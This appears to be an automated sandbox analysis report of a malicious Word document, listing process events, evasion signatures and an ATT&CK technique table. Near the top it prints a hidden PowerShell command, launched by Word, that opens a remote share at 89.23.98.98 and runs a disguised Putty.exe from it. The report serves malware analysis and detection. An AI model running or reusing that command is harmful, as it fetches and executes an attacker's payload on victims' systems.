Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5773Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2653Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 1397Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3696Thread sleep time: -1560000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exeNetwork Connect: 89.23.98.98 80Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\89.23.98.98@80\file\Jump to behavior
Source: explorer.exe, 00000005.00000002.1091711614.00000000002CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanlbusn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: explorer.exe, 00000005.00000002.1092043382.0000000003CD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: \\89.23.98.98@80\file\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: \\89.23.98.98@80\filJump to behavior
Source: C:\Windows\explorer.exeFile opened: \\89.23.98.98@80\fileJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information22
Scripting
Valid Accounts1
Command and Scripting Interpreter
22
Scripting
112
Process Injection
1
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Exploitation for Client Execution
1
DLL Side-Loading
1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)112
Process Injection
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS21
